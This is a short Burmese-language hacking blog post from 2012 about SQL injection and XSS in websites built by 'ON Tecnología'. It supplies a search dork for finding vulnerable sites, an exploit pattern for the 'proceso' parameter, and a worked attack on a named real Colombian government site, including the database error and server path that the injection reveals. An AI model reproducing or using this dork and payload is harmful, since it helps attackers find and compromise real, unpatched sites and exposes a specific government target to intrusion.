Subscribe For Free Updates!

We'll not spam mate! We promise.

Wednesday, November 7, 2012

ON Technologia SQL Injection


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw4h-nEZvQ1Q9ctp500GO5IkFhxPGWQYgQIukf4VYg4hDzdbYPzcqZkgBteVQEZRBN_-WWC1P1qIK05bY_bAdT3KfqrofdzDKs4Va-NTzRzd0IcJ7PK2Sq-AkpdCR6TbFSEYkWCaKToEk/s1600/sql-injection2.jpg

ကဲ ကြ်န္ေတာ္ ေနမေကာင္းလုိ ့ ဘေလာ့ေတြမတင္ျဖစ္ဘူးျဖစ္သြားတယ္ဗ်ာ..

ခုျပန္လာျပီဆုိေတာ့ ျပန္တင္ျပီေပ့ါေနာ္...
အခုတင္မွာေလးကေတာ့ XSS နဲ ့ SQL injection နည္း သစ္ေလးတစ္ခုပါဘဲ...

ကဲစလုိက္ရေအာင္ဗ်ာ..

Dork: intext:"Desarrollado por: ON Tecnología"
 
# Expl0it/P0c ###################
http://site.com/*.php?proceso= < Sql Vulnerability Path >
http://site.com/*.php?proceso= < Xss Vulnerability Path >
ကဲ Dork ေလး ေပးလုိက္ျပီေနာ္.. ဒီေတာ့ ၾကိုက္တဲ့လင့္ တစ္ခု ရွာယူလုိက္ပါ... ကြ်န္ကေတာ့
http://www.esecarmenemiliaospina.gov.co/contratos/verprocesos.php?proceso=131

ဘဲ ယူလုိက္ပါျပီ ဆုိပါေတာ့ဗ်ာ.. ဒီအခ်ိန္မွာ Basic injection code ျဖစ္တဲ့ ' ေလးကိုအစားသြင္းလုိက္ပါ..

http://www.esecarmenemiliaospina.gov.co/contratos/verprocesos.php?proceso=131'

လုိမ်ဳိးေပ့ါ.. ဒီေတာ့ ထြက္လာျပီ ေိခိ...

ေအာက္ကလုိမ်ဳိးေလးေပ့ါ.. ဒီေတာ့ စတင္ျပီး sql injection ထုိးနုိင္ပါျပီခင္ဗ်ာ...

XSS ကုိေတာ့ ဒီနည္းက သုံးရပါေသးတယ္ ကြ်န္ေတာ္က မကြ်မ္းက်င္ေသးေတာ့ မရွင္းထားပါဘူး...

Warning: mysql_fetch_array() expects parameter 1 to be resource, integer given in /home/eseceosp/public_html/contratos/verprocesos.php on line 18

Please Give Us Your 1 Minute In Sharing This Post!
SOCIALIZE IT →
FOLLOW US →
SHARE IT →
Powered By: BloggerYard.Com

1 comments:

  1. တားေၾကာက္တယ္။ ဟတ္တင္း။ ဟိဟိ။

    ReplyDelete